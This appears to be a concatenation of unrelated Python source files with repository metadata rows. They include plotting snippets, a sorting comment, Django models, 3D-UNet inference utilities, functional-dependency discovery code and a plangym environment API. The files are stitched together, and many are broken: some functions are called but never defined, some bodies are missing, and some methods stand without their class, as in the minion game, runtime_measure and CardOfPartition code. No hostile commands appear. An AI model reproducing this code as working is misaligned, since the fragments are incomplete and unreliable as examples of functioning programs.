ax[0].plot( rhos, nu(rhos), color = [0.5, 0.5, 0.8], linewidth = 3.0)
ax[0].plot( rho[0], u[0], 'k.', linewidth = 3.0)
ax[0].plot( rho, u, 'k' )
ax[0].plot( [-1, -1], [-1.5, 1.5], 'k--')
ax[0].set_ylabel('u')
ax[0].set_xlabel(r'$\rho$')
ax[0].text(0.5, nu(0.5)+0.05, r'$u_0$')
ax[0].text(0.95, nrho(0.9, v), r'$\rho_0$')
ax[0].axis([-2, 2, -1.0, 1.5])
ax[1].plot( time, u, label = 'u')
ax[1].plot( time, rho, label = r'$\rho$' )
ax[1].legend()
ax[1].set_xlabel('time')
plt.show() | 28.603774 | 85 | 0.529024 |
5f5c0b0acb48624cb76c04ec88d096e81b40a0f1 | 176 | py | Python | test_script.py | SamPurle/DE17_Flask | a6462b85854f7bd72c80ebcc555d50488ef17e67 | [
"MIT"
] | null | null | null | test_script.py | SamPurle/DE17_Flask | a6462b85854f7bd72c80ebcc555d50488ef17e67 | [
"MIT"
] | null | null | null | test_script.py | SamPurle/DE17_Flask | a6462b85854f7bd72c80ebcc555d50488ef17e67 | [
"MIT"
] | null | null | null | import numpy as np
import os
my_array = np.zeros(10)
print(my_array)
os.system('pip freeze > requirements.txt')
my_list = [1,2,3,4,5]
for item in my_list:
print(item)
| 12.571429 | 42 | 0.693182 |
5f5ebabcae4886b932638d5f3ecd10d1eb595d7b | 6,058 | py | Python | lib/blastin.py | zbwrnz/blastdbm | ee694c01ebb00779623702738a9c958fd496a080 | [
"Unlicense"
] | 1 | 2018-03-22T10:34:20.000Z | 2018-03-22T10:34:20.000Z | lib/blastin.py | arendsee/blastdbm | ee694c01ebb00779623702738a9c958fd496a080 | [
"Unlicense"
] | null | null | null | lib/blastin.py | arendsee/blastdbm | ee694c01ebb00779623702738a9c958fd496a080 | [
"Unlicense"
] | null | null | null | #! /usr/bin/python3
import argparse
import os
import re
import sqlite3 as sql
import sys
import xml.etree.cElementTree as et
import traceback
import lib.initialize as initialize
import lib.sqlite_interface as misc
import lib.meta as meta
# ==================
# EXPORTED FUNCTIONS
# ==================
| 31.552083 | 83 | 0.530538 |
5f63c4934790515bb6fc74d4d7ecc9a70d977a36 | 646 | py | Python | tests/test_get_image.py | kortizceballos/codeastro-group6 | 9f0ceb8a0fca3e619dbabe97105a3f283e59fa04 | [
"BSD-3-Clause"
] | 1 | 2021-06-25T21:20:42.000Z | 2021-06-25T21:20:42.000Z | tests/test_get_image.py | kortizceballos/codeastro-group6 | 9f0ceb8a0fca3e619dbabe97105a3f283e59fa04 | [
"BSD-3-Clause"
] | null | null | null | tests/test_get_image.py | kortizceballos/codeastro-group6 | 9f0ceb8a0fca3e619dbabe97105a3f283e59fa04 | [
"BSD-3-Clause"
] | null | null | null | from matplotlib.pyplot import get
import pyhips
from pyhips import get_image
def test_get_image():
"""
Tests the get_image() function to make sure no errors are thrown.
"""
assert get_image("Vega", frame="ICRS", survey="DSS", cmap="plasma") == 0
assert get_image("notanid", frame="ICRS", survey="DSS", cmap="plasma") == 1
assert get_image("Vega", frame="notaframe", survey="DSS", cmap="plasma") == 1
assert get_image("Vega", frame="ICRS", survey="notasurvey", cmap="plasma") == 1
assert get_image("Vega", frame="ICRS", survey="DSS", cmap="notacolormap") == 1
if __name__ == "__main__":
test_get_image() | 35.888889 | 83 | 0.662539 |
5f65055d81665e397feccfc78dd6d2f299634b64 | 138 | py | Python | cumulus2/template.py | peterkh/cumulus2 | 11352ce469acb0c319ba9cfb8691d80f4ae5048e | [
"Apache-2.0"
] | 1 | 2016-02-12T11:54:07.000Z | 2016-02-12T11:54:07.000Z | cumulus2/template.py | peterkh/cumulus2 | 11352ce469acb0c319ba9cfb8691d80f4ae5048e | [
"Apache-2.0"
] | null | null | null | cumulus2/template.py | peterkh/cumulus2 | 11352ce469acb0c319ba9cfb8691d80f4ae5048e | [
"Apache-2.0"
] | null | null | null | """
Template module for cumulus.
Template class for reading a yaml template and creating data_source objects to
retrieve external data.
"""
| 23 | 76 | 0.797101 |
5f67096a7114362044846dbb3a2978d1562f88ac | 700 | py | Python | Python-AI-Algorithms/Bubble_sort.py | screadore/Artificial-Intelligence-Sorting-Algorithms | d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c | [
"MIT"
] | null | null | null | Python-AI-Algorithms/Bubble_sort.py | screadore/Artificial-Intelligence-Sorting-Algorithms | d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c | [
"MIT"
] | null | null | null | Python-AI-Algorithms/Bubble_sort.py | screadore/Artificial-Intelligence-Sorting-Algorithms | d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c | [
"MIT"
] | null | null | null | # Bubble sort steps through the list and compares adjacent pairs of elements. The elements are swapped if they are in the wrong order. The pass through the unsorted portion of the list is repeated until the list is sorted. Because Bubble sort repeatedly passes through the unsorted part of the list, it has a worst-case complexity of O(n^2).
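# Illustrative sketch (added, not necessarily the original implementation): a plain
# bubble sort matching the description above; each outer pass bubbles the largest
# remaining element to the end of the unsorted portion.
def bubble_sort_sketch(values):
    items = list(values)
    n = len(items)
    for end in range(n - 1, 0, -1):          # shrink the unsorted portion each pass
        swapped = False
        for i in range(end):
            if items[i] > items[i + 1]:      # adjacent pair in the wrong order
                items[i], items[i + 1] = items[i + 1], items[i]
                swapped = True
        if not swapped:                      # already sorted: stop early
            break
    return items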
| 36.842105 | 342 | 0.591429 |
5f670af72f12c73cbff679c29371d4269f74b778 | 551 | py | Python | Practice/Python/Strings/the_minion_game.py | nifannn/HackerRank | b05318251226704b1fb949c29aa49493d6ced44b | [
"MIT"
] | 7 | 2019-02-22T10:34:26.000Z | 2021-07-13T01:51:48.000Z | Practice/Python/Strings/the_minion_game.py | nifannn/HackerRank | b05318251226704b1fb949c29aa49493d6ced44b | [
"MIT"
] | null | null | null | Practice/Python/Strings/the_minion_game.py | nifannn/HackerRank | b05318251226704b1fb949c29aa49493d6ced44b | [
"MIT"
] | 7 | 2018-11-09T13:52:34.000Z | 2021-03-18T20:36:22.000Z |
if __name__ == '__main__':
minion_game(input("Enter a string: "))
| 30.611111 | 65 | 0.604356 |
5f6e27388481683369aca2bd805d2c503d7286e8 | 189 | py | Python | deep_learning_zero/ch5/sample.py | kaito0223/shakyou | 8d901b4da24fbf0c708e3eb429a57d194e9857c1 | [
"MIT"
] | null | null | null | deep_learning_zero/ch5/sample.py | kaito0223/shakyou | 8d901b4da24fbf0c708e3eb429a57d194e9857c1 | [
"MIT"
] | null | null | null | deep_learning_zero/ch5/sample.py | kaito0223/shakyou | 8d901b4da24fbf0c708e3eb429a57d194e9857c1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
X = np.random.rand(2) #input
W = np.random.rand(2,3) #weight
B = np.random.rand(3) #bias
print(X)
print(W)
print(B)
Y=np.dot(X,W)+B
print(Y)
| 11.8125 | 31 | 0.613757 |
5f71554b9254c1a62eba83f18f61c6f664cfe709 | 2,485 | py | Python | bdd/contact_stepts.py | LukinVV/python_training | 9e6eb57fe9527fd591d563b4219c19e49188c4de | [
"Apache-2.0"
] | null | null | null | bdd/contact_stepts.py | LukinVV/python_training | 9e6eb57fe9527fd591d563b4219c19e49188c4de | [
"Apache-2.0"
] | null | null | null | bdd/contact_stepts.py | LukinVV/python_training | 9e6eb57fe9527fd591d563b4219c19e49188c4de | [
"Apache-2.0"
] | null | null | null | from pytest_bdd import given, when, then
from model.contact import Contact
import random | 42.118644 | 101 | 0.781087 |
5f72286dd657c066d24e11dfe7993aa6f68aabbc | 769 | py | Python | FigureMaker.py | space-physics/histfeas | caa0100087d8c2b8711c1c3cb60c322379ef5431 | [
"MIT"
] | null | null | null | FigureMaker.py | space-physics/histfeas | caa0100087d8c2b8711c1c3cb60c322379ef5431 | [
"MIT"
] | null | null | null | FigureMaker.py | space-physics/histfeas | caa0100087d8c2b8711c1c3cb60c322379ef5431 | [
"MIT"
] | 1 | 2015-05-22T23:51:58.000Z | 2015-05-22T23:51:58.000Z | #!/usr/bin/env python
"""
Figures generated by HiST program
intended for use with in/ files including:
*_flame.ini
*_impulse.ini
*_trans.ini
Flaming Aurora 2 cameras:
./FigureMaker.py in/2cam_flame.ini
Translating Aurora 2 cameras:
./FigureMaker.py in/2cam_trans.ini
Impulse Aurora (for testing):
./FigureMaker.py in/2cam_impulse.ini
Table of results for 2 and 3 cam:
./FigureMaker.py in/table_flame{2,3}.ini
REAL actual camera data (just dump synchronized frames):
./FigureMaker.py -m realvid in/apr14T085454
-m optim reconstruct only
"""
from histfeas import userinput, hist_figure
from histfeas.loadAnalyze import readresults, findxlsh5
P = userinput()
#%% compute
if not P["load"]:
hist_figure(P)
#%% load
flist, P = findxlsh5(P)
readresults(flist, P)
| 20.783784 | 55 | 0.758127 |
5f72433b75556b159f57faa7593653f49eb2cb21 | 3,557 | py | Python | T53/webapp/accounts/models.py | DevelopAppWithMe/Hackathon_5.0 | 6af503a995721c04986931d6a29d8f946ceaa067 | [
"MIT"
] | null | null | null | T53/webapp/accounts/models.py | DevelopAppWithMe/Hackathon_5.0 | 6af503a995721c04986931d6a29d8f946ceaa067 | [
"MIT"
] | null | null | null | T53/webapp/accounts/models.py | DevelopAppWithMe/Hackathon_5.0 | 6af503a995721c04986931d6a29d8f946ceaa067 | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
PermissionsMixin,
)
from django.core.validators import RegexValidator
from django.db import models
| 32.336364 | 104 | 0.687939 |
5f72dad431a7abe4ecae9aa703b14fc2183ff13a | 2,998 | py | Python | pyv6m/ha/v6m.py | dubnom/pyv6m | d56bf3f3d39b7c2f747b08bc1974dc3dbe6ccff8 | [
"MIT"
] | 1 | 2020-02-16T00:42:17.000Z | 2020-02-16T00:42:17.000Z | pyv6m/ha/v6m.py | dubnom/pyv6m | d56bf3f3d39b7c2f747b08bc1974dc3dbe6ccff8 | [
"MIT"
] | null | null | null | pyv6m/ha/v6m.py | dubnom/pyv6m | d56bf3f3d39b7c2f747b08bc1974dc3dbe6ccff8 | [
"MIT"
] | null | null | null | """Component to control v6m relays and sensors.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/v6m/
"""
import logging
import voluptuous as vol
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, CONF_HOST, CONF_PORT, CONF_NAME)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pyv6m==0.0.1']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'v6m'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PORT): cv.port,
vol.Optional(CONF_NAME, default=DOMAIN): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, base_config):
"""Start V6M controller."""
from pyv6m.pyv6m import V6M
config = base_config.get(DOMAIN)
host = config[CONF_HOST]
port = config[CONF_PORT]
controller = V6MController(host, port)
hass.data[config[CONF_NAME]] = controller
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, cleanup)
return True
| 28.552381 | 75 | 0.615744 |
5f7622df0a14efca2dcdfe048326621ae11f4cbc | 550 | py | Python | blog/models.py | Happy-Project-Foundation/HappyProject | 86e9fa7633e68c026e0003f8494df0226fa0dfcf | [
"Apache-2.0"
] | 3 | 2021-12-04T15:00:54.000Z | 2021-12-08T16:07:35.000Z | blog/models.py | BirnadinErick/HappyProject | 4993a2d966d9c1458ce0e29e72c3a758a7a4ef54 | [
"Apache-2.0"
] | 3 | 2021-12-15T00:49:01.000Z | 2021-12-16T00:46:14.000Z | blog/models.py | Happy-Project-Foundation/HappyProject | 86e9fa7633e68c026e0003f8494df0226fa0dfcf | [
"Apache-2.0"
] | 3 | 2021-12-04T14:18:15.000Z | 2021-12-05T08:40:13.000Z | import uuid
from django.db import models
from django.db.models.fields import TextField
| 32.352941 | 109 | 0.736364 |
5f79434b07d0fd0852489b19f8f438fa54ae857d | 7,273 | py | Python | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | 2 | 2021-09-26T07:03:54.000Z | 2022-02-21T15:46:30.000Z | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | null | null | null | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | 1 | 2021-04-16T06:11:41.000Z | 2021-04-16T06:11:41.000Z | """
References: https://github.com/scaelles/OSVOS-TensorFlow
"""
from __future__ import print_function
import os
import random
import tensorflow as tf
import time
import numpy as np
from utils import models
from utils.load_data_finetune import Dataset
from utils.logger import create_logger
# seed
seed = random.randint(1, 100000)
# seed = 0
tf.random.set_seed(seed)
random.seed(seed)
np.random.seed(seed)
# User defined path parameters
# finetuning (one label) and testing dataset
sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p'
sequence_names = os.listdir(sequence_images_path)
# Get the best frame selection from BubblNet
bub_frame_path = './datasets/bubbleNet_data/rawData'
def create_non_exist_file(non_exist_file):
"""Create the file when it does not exist"""
if not os.path.exists(non_exist_file):
os.mkdir(non_exist_file)
def select_optimal_frame(seq_name):
"""Use the optimal frame from BubbleNet selection for fine-tuning"""
# # Select from BN0 or BNLF
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt')
# # Select from BN0
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt')
# Select from BNLF
frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt')
frame_file = open(frame_txt, 'r')
frame_nums = frame_file.readlines()
# The following code is used to extract the name of frame selection
# refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information
if len(frame_nums) == 3:
frame_random_jpg = frame_nums[2][:9]
frame_random_png = frame_nums[2][:5] + '.png'
# when two bubblenet models select the different frames, the txt file will have 5 lines
elif len(frame_nums) == 5:
frame_suggestion1_jpg = frame_nums[2][:9]
frame_suggestion1_png = frame_nums[2][:5] + '.png'
frame_suggestion2_jpg = frame_nums[4][:9]
frame_suggestion2_png = frame_nums[4][:5] + '.png'
frame_random_lst = random.choice(
[[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]])
frame_random_jpg = frame_random_lst[0][:9]
frame_random_png = frame_random_lst[1][:9]
else:
raise ValueError("frame file from BubbleNet is not correct")
return frame_random_jpg, frame_random_png
if __name__ == '__main__':
train_test(sequence_names)
| 41.56 | 126 | 0.639214 |
5f79476b04b3854cb2181098acbee05c751aa836 | 307 | py | Python | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 2 | 2021-11-13T12:23:41.000Z | 2021-12-24T14:09:49.000Z | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 1 | 2022-03-29T19:13:24.000Z | 2022-03-30T18:57:23.000Z | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 1 | 2021-11-13T12:30:01.000Z | 2021-11-13T12:30:01.000Z | from dataclasses import field, dataclass
from typing import List
from kinopoisk_unofficial.contract.response import Response
from kinopoisk_unofficial.model.season import Season
| 25.583333 | 59 | 0.814332 |
5f7a417145bc1e9d7aeea4542c8fef811419cb42 | 4,906 | py | Python | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | import subprocess
import os
import shutil
import tempfile
import random
import string
import yaml
src_dir=os.path.dirname(os.path.realpath(__file__))
#def _write_text_file(fname,txt):
# with open(fname,'w') as f:
# f.write(txt)
| 35.294964 | 155 | 0.664492 |
5f7b66cd930462b5d1756ba227c23eb8265b8002 | 5,040 | py | Python | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 388 | 2018-09-13T20:48:58.000Z | 2020-11-23T11:52:13.000Z | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 597 | 2018-10-08T12:45:29.000Z | 2020-11-24T17:53:12.000Z | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 228 | 2018-11-06T02:04:14.000Z | 2020-12-09T07:51:02.000Z | #! /usr/bin/env python3
# coding=utf-8
# Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved.
# Copyright 2021 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import time
from scipy import signal
from global_vars import *
__doc__ = """
Collection of utilities 3D UNet MLPerf-Inference reference model uses.
gaussian_kernel(n, std):
returns gaussian kernel; std is standard deviation and n is number of points
apply_norm_map(image, norm_map):
applies normal map norm_map to image and return the outcome
apply_argmax(image):
returns indices of the maximum values along the channel axis
finalize(image, norm_map):
finalizes results obtained from sliding window inference
prepare_arrays(image, roi_shape):
returns empty arrays required for sliding window inference upon roi_shape
get_slice_for_sliding_window(image, roi_shape, overlap):
returns indices for image stride, to fulfill sliding window inference
timeit(function):
custom-tailored decorator for runtime measurement of each inference
"""
def gaussian_kernel(n, std):
"""
Returns gaussian kernel; std is standard deviation and n is number of points
"""
gaussian1D = signal.gaussian(n, std)
gaussian2D = np.outer(gaussian1D, gaussian1D)
gaussian3D = np.outer(gaussian2D, gaussian1D)
gaussian3D = gaussian3D.reshape(n, n, n)
gaussian3D = np.cbrt(gaussian3D)
gaussian3D /= gaussian3D.max()
return gaussian3D
def apply_norm_map(image, norm_map):
"""
Applies normal map norm_map to image and return the outcome
"""
image /= norm_map
return image
def apply_argmax(image):
"""
Returns indices of the maximum values along the channel axis
Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result
Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result
"""
channel_axis = 1
image = np.argmax(image, axis=channel_axis).astype(np.uint8)
image = np.expand_dims(image, axis=0)
return image
def finalize(image, norm_map):
"""
Finalizes results obtained from sliding window inference
"""
# NOTE: layout is assumed to be linear (NCDHW) always
# apply norm_map
image = apply_norm_map(image, norm_map)
# argmax
image = apply_argmax(image)
return image
def prepare_arrays(image, roi_shape=ROI_SHAPE):
"""
Returns empty arrays required for sliding window inference such as:
- result array where sub-volume inference results are gathered
- norm_map where normal map is constructed upon
- norm_patch, a gaussian kernel that is applied to each sub-volume inference result
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
image_shape = list(image.shape[2:])
result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype)
norm_map = np.zeros_like(result)
norm_patch = gaussian_kernel(
roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype)
return result, norm_map, norm_patch
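# Usage sketch (an assumption, based only on the docstrings above): the arrays
# returned by prepare_arrays() are typically combined during sliding-window
# inference roughly like this, where `infer` stands for some model callable and
# `get_slice_for_sliding_window` is the generator mentioned in the module
# docstring but not shown here.
#
#   result, norm_map, norm_patch = prepare_arrays(image, ROI_SHAPE)
#   for i, j, k in get_slice_for_sliding_window(image, ROI_SHAPE, overlap=0.5):
#       roi = (..., slice(i, i + ROI_SHAPE[0]),
#              slice(j, j + ROI_SHAPE[1]),
#              slice(k, k + ROI_SHAPE[2]))
#       result[roi] += infer(image[roi]) * norm_patch   # weight each sub-volume
#       norm_map[roi] += norm_patch                     # accumulate the weights
#   segmentation = finalize(result, norm_map)           # normalize, then argmax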
def runtime_measure(function):
"""
A decorator for runtime measurement
Custom-tailored for measuring inference latency
Also prints str: mystr that summarizes work in SUT
"""
return get_latency
| 32.101911 | 91 | 0.698611 |
5f7d2edfb9acb222096440265492c363f375f8a6 | 3,047 | py | Python | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 13 | 2019-03-22T13:30:04.000Z | 2022-02-01T04:46:44.000Z | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 3 | 2020-07-01T11:17:40.000Z | 2022-02-13T11:20:34.000Z | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 11 | 2018-07-02T23:46:31.000Z | 2021-12-14T12:29:38.000Z | import binaryRepr
# Create decorator function to see how many times functions are called
# Calculate Partition (C_k, r(U)) - the partitions
# of each candidate at level k are calculated
# Takes in data frame of relation and a candidate in C_km1
# Outputs partition of Candidate in C_km1 in relation to data frame
# Obtain FDs(C_km1) - checks the FDs of each
# candidate X in C_k
# - FDs of the form X -> v_i, where
# v_i *Exists* U - X^{+} are checked by
# comparing *Partition* X and *Partition* X v_i
#
# F = Null_Set
# for each candidate X in C_km1
# for each v_i *exists* U - X^{+} \\Pruning rule 3
# if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then
# {
# X* = X *Union* {v_i}
# F = F *Union* {X -> v_i} \\Theorem 2
# }
# return (F);
def f(C_km1, df, Closure, U, Cardinality):
# Set F to null list; Initialize U_c to remaining columns in data frame
F = []; U_c = list(df.head(0));
# Identify the subsets whose cardinality of partition should be tested
SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])];
# Add singleton set to SubsetsToCheck if on first k-level
if len(C_km1[0]) == 1: SubsetsToCheck += C_km1;
# Iterate through subsets mapped to the Cardinality of Partition function
for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))):
# Add Cardinality of Partition to dictionary
Cardinality[binaryRepr.toBin(Cand, U)] = Card;
# Iterate through candidates of C_km1
for Candidate in C_km1:
# Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate
for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])):
# Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i}
if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]:
# Add attribute v_i to closure
Closure[binaryRepr.toBin(Candidate, U)].add(v_i)
# Add list (Candidate, v_i) to F
F.append([tuple(Candidate), v_i]);
return Closure, F, Cardinality;
| 43.528571 | 187 | 0.637348 |
5f7e6f4612c23637da085f15ec80d97da8c65063 | 1,712 | py | Python | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | 1 | 2021-01-16T15:42:01.000Z | 2021-01-16T15:42:01.000Z | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | null | null | null | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | null | null | null | import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
ActivityBenchmark()
| 45.052632 | 139 | 0.624416 |
5f8081343c9866235ed311ae6467c672bfbe7609 | 4,685 | py | Python | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | import xml.etree.ElementTree as et
from dateutil import parser
from django.shortcuts import render
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import untangle
from .forms import MenuplanSearchForm
from .forms import MenuplanCreateForm
from .tables import MenuplanTable
from .dbaccess import add_menuplan
from .dbaccess import get_menuplans
from .dbaccess import create_menuplan
from .dbaccess import get_menuplan_display
| 30.225806 | 81 | 0.547492 |
5f809ea0bdda1d52d937bea676c3f2375a0406e8 | 6,448 | py | Python | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 5 | 2021-12-01T09:55:23.000Z | 2021-12-21T16:23:33.000Z | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 1 | 2022-03-14T16:50:41.000Z | 2022-03-14T16:50:41.000Z | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 2 | 2021-11-03T09:43:09.000Z | 2021-11-17T10:16:29.000Z | from contextlib import closing
from io import StringIO
import numpy
import pandas
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extensions import connection as psycopg2_connection
from data_detective_airflow.dag_generator.works import WorkType
from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
| 39.317073 | 109 | 0.640199 |
5f83b8fcb8f9923c7beb83eb883b788a12549bf3 | 32,588 | py | Python | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 3 | 2020-03-25T22:19:17.000Z | 2020-11-02T16:11:32.000Z | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 44 | 2020-03-25T14:17:54.000Z | 2022-03-12T00:18:48.000Z | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 2 | 2020-03-25T12:17:12.000Z | 2020-06-19T23:07:52.000Z | """Plangym API implementation."""
from abc import ABC
from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union
import gym
from gym.envs.registration import registry as gym_registry
from gym.spaces import Space
import numpy
import numpy as np
wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]]
def step(
self,
action: Union[numpy.ndarray, int, float],
state: numpy.ndarray = None,
dt: int = 1,
) -> tuple:
"""
Step the environment applying the supplied action.
Optionally set the state to the supplied state before stepping it.
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
state: Set the environment to the given state before stepping it.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
if state is not None:
self.set_state(state)
obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt)
if state is not None:
new_state = self.get_state()
data = new_state, obs, reward, terminal, info
else:
data = obs, reward, terminal, info
if terminal and self.autoreset:
self.reset(return_state=False)
return data
def step_batch(
self,
actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]],
states: Union[numpy.ndarray, Iterable] = None,
dt: Union[int, numpy.ndarray] = 1,
) -> Tuple[numpy.ndarray, ...]:
"""
Vectorized version of the `step` method. It allows to step a vector of \
states and actions.
The signature and behaviour is the same as `step`, but taking a list of \
states, actions and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)``
else returns ``(new_states, observs, rewards, ends, infos)``
"""
dt = (
dt
if isinstance(dt, (numpy.ndarray, Iterable))
else numpy.ones(len(actions), dtype=int) * dt
)
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)]
return tuple(list(x) for x in zip(*data))
def init_env(self) -> None:
"""
Run environment initialization.
Including in this function all the code which makes the environment impossible
to serialize will allow to dispatch the environment to different workers and
initialize it once it's copied to the target process.
"""
pass
def close(self) -> None:
"""Tear down the current environment."""
pass
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
pass
